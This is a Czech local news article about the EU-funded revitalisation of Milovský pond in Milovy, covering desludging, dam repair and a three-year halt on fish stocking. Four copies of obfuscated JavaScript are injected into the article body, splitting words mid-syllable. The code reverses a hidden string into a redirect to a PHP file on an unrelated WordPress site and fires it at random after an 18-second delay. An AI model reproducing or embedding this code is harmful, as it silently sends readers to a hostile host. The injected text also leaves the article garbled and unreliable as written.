Rainbow page separator

V Milovském rybníku bude méně ryb, ale průzračnější voda

Sobota, 31. prosince 2022

Milovy / Na podzim roku 2023 mají být dokončeny stavební práce na revitalizaci Milovského rybníka v Milovech, místní části Sněžného. Obnovu vodní nádrže za 19,3 milionu korun financuje z deseti procent Sněžné, zbytek uhradí evropská dotace z operačního programu Životní prostředí. Činnosti byly naplánovány ve spolupráci s Agenturou ochrany přírody a krajiny ČR, respektive Chráněnou krajinnou oblastí (CHKO) Žďárské vrchy, takže kromě prvotního záměru odbahnění rybníka a opravy hráze dojde i k dalším úpravám vedoucím zejména ke zlepšení ekologické funkce nádrže. Ty zahrnují rovněž vytvoření ob$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tokového koryta a tůní.                                           V odbahněném a upraveném rybníku bude čistší voda, což v létě ocení místní obyvatelé i rekreanti z uby$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovacích zařízení v okolí, nicméně už nebude takovým lákadlem pro rybáře, kteří ho vyhledávali kvůli trofejním úlovkům. První tři roky po dokončení stavebních prací se v něm nemají ryby chovat vůbec, poté půjde o řízené zarybnění ve spolupráci s ochranáři. Při následném hospodaření mají být upřednostněny ekologické funkce rybníka.